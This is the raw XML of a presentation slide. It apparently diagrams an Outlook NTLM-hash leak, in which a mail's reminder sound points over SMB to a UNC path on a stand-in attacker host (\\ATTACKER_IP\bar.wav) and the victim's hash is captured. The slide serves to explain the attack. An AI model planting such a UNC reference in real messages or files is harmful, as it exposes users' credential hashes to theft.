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90E67-446A-5A6E-7415-DB84BDA8D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78A406-A399-5337-F72D-5F7A907E5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CAD43-56F2-F04A-A3A5-00AC3815D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0A11-90E8-4E31-973E-D86D2E17BE5D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AB269-C2B9-A0B6-45F9-E0F1A6AA7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471AE-1105-6089-A4E2-A74FFC9E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EC19-AAD0-4654-8481-C83D721DF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1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B2676-326B-DF0D-ADA0-44594BB1B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8EABE-3B3D-672F-8DB4-05050DC41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A9998-EEC6-4F8A-6C9F-AF1653F79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0A11-90E8-4E31-973E-D86D2E17BE5D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01121-541B-4C3F-2D81-C1AFD33C1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1EAD3-9C66-4308-FEDF-AB729E16A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EC19-AAD0-4654-8481-C83D721DF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9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C287C9-C52A-322C-BF5E-2631D73587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88E814-5575-C7A3-BBD7-EB9AA20EA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B347C-1943-7BA3-D4B8-5DDE092CE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0A11-90E8-4E31-973E-D86D2E17BE5D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32FF9-1B0D-78AB-EEC1-BB2219300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C4946-7B65-5B3A-399E-FD230135F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EC19-AAD0-4654-8481-C83D721DF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16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D4B36-066D-9D83-4268-E4746779A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D8FF6-D729-C294-33A2-11219E3E3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2AE35-4995-10C4-DB19-543346AE1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0A11-90E8-4E31-973E-D86D2E17BE5D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CE601-C4D0-1AB3-94E1-F765806BC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F43D1-EC67-7454-4FC9-1686B0186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EC19-AAD0-4654-8481-C83D721DF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23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67491-EECF-67CC-7BA6-29CCCA3E5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770F6-87EB-3CF3-3D0F-1775AD5E1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A0F4E-2641-05AF-A2FD-CBB90228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0A11-90E8-4E31-973E-D86D2E17BE5D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24EF0-F718-4072-98E2-A12D566E2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7723B-2E57-7C36-86F9-AA12A0A55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EC19-AAD0-4654-8481-C83D721DF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67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14A39-16E1-1636-C5C0-CBC07F015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92376-C4BA-5C1E-DD64-DFA454BD12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20F0C8-4197-8078-C457-4BC8F1449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6489D-B729-3F5F-695D-066F3953D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0A11-90E8-4E31-973E-D86D2E17BE5D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FF37C-FDE8-411C-9C89-F3970E57D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CE152-CBC8-733E-56CC-F92F25CF1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EC19-AAD0-4654-8481-C83D721DF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83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48682-5AB6-03E3-5392-5E5278653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951F7-A0C8-A6AF-CBBC-3E7ADB196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EA3B81-7EE4-F4B8-5DE1-DAD067235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4401AA-7351-BD59-47CD-ACE42A16B9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B36BFE-EFE1-9CDE-71D7-3F3B6FACB2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5EDA80-CA3F-50C8-6D18-BDC9A0B72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0A11-90E8-4E31-973E-D86D2E17BE5D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94DE06-E1BF-807A-5CFE-79F0DABA3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73307-69F9-22D3-B08A-9038DBBAE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EC19-AAD0-4654-8481-C83D721DF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99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35246-EBDE-9E69-229B-E93205496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009ACD-22AE-F0CE-9022-D2A72838F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0A11-90E8-4E31-973E-D86D2E17BE5D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5D365B-5939-957C-FBF1-ECDBCB518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D7AD58-A0E1-BC4C-B6B6-1EBA6332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EC19-AAD0-4654-8481-C83D721DF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39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B1D9BF-1EF8-7798-DC23-EB0440A5C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0A11-90E8-4E31-973E-D86D2E17BE5D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21E295-8E6F-537D-9878-7C8C7B765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2DE6E-563B-D2B6-DBB4-BFA60C117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EC19-AAD0-4654-8481-C83D721DF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95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5089B-B145-9E33-B78D-683AEFCB4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CBFF0-2599-5061-6D6B-BF8409026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6018F-3D52-A620-4EDD-B1E056983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FC2F6-A455-AF3A-7E87-8999D1312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0A11-90E8-4E31-973E-D86D2E17BE5D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B33D1-B8F2-B282-09D9-17108F62E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B2300-5D06-10CE-D4ED-EDC12A111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EC19-AAD0-4654-8481-C83D721DF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8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2C5DD-FDCF-24F5-4266-2F1EBBDBC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AE3271-F7D4-48F6-DCC6-6479975A22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D08FF7-7D8F-7F8F-B930-533A9BE03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B8F5C-7520-4E84-72E7-2D074BFA0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0A11-90E8-4E31-973E-D86D2E17BE5D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A216C-1F5C-57F0-1899-9BCC12AF7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7E308-7E09-ACAE-927C-EBC6EF639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EC19-AAD0-4654-8481-C83D721DF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3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8DBC1D-C275-6957-EB7F-EA94403BA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370D7-4E47-250E-9562-2CEBF8344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90AED-F6ED-53D5-950E-447986B7D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50A11-90E8-4E31-973E-D86D2E17BE5D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6D51A-944B-561F-25C5-99A150031E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EEA98-B2FD-83A1-7C89-3C79458BFF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EEC19-AAD0-4654-8481-C83D721DF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34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2EDA53-1F00-EAEF-5F38-16F3570F6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727" y="439827"/>
            <a:ext cx="1959846" cy="1959846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="Server - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3CB29EB-E62E-D352-C801-72D68D834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079" y="3713008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729E552-B853-3D43-FD51-0480CE01079D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="1030" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6911479" y="1419750"/>
            <a:ext cx="2842659" cy="2940958"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80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4140658-986C-F2AC-B0EF-11E7696C9F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285633" y="2183780"/>
            <a:ext cx="1384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user@outlook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 4" descr="Outlook.com getting new Mail, Calendar, and People experiences | Windows  Central">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC5C702-62E7-553B-A8AB-5604BC9AA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7248" y="772054"/>
            <a:ext cx="1296890" cy="129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F36E68E-BA73-E6D9-03D5-97EF5B517E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413676" y="1715535"/>
            <a:ext cx="1384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user@outlook.com</a:t>
            </a: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6BD9D8B9-5573-FDC4-0296-52598D376BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506565" y="3436009"/>
            <a:ext cx="1585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Attacker Shared (SMB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1055" name="Connector: Elbow 1054">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13ABABF8-4B14-F4BD-1917-21C4C895B8F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1030" idx="1"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2997727" y="1419750"/>
            <a:ext cx="2618352" cy="2940958"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1087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7" name="TextBox 1066">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A666B8-51A6-249C-9B88-B7C21A797669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901803" y="1169016"/>
            <a:ext cx="1118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send/save mail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="TextBox 1079">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B76B4BE-A86D-9F2A-EE3A-E4CCD3161D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651702" y="4096841"/>
            <a:ext cx="1811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request file sound by SMB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1089" name="Straight Arrow Connector 1088">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157B26F9-3619-A146-E891-5C05416CF121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957573" y="1419750"/>
            <a:ext cx="3499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2" name="TextBox 1091">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1255BC2E-00F1-A979-48F6-2B159A4F643E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296505" y="1415473"/>
            <a:ext cx="2355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With UNC: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1200" dirty="0"/>
              <a:t>\\ATTACKER_IP\bar.wav</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="TextBox 1099">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0AD0D2-0025-E71C-A7B4-FD020811B237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3461570" y="4120223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 hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631781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LONG LÊ QUANG</dc:creator>
  <cp:lastModifiedBy>LONG LÊ QUANG</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-14T03:41:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T04:03:10Z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2023-04-14T03:52:46Z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66abbb32-8736-4f6c-a448-d5cb6c542797</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ActionId">
    <vt:lpwstr>8286faf8-658d-44df-af00-5d2c72157b35</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>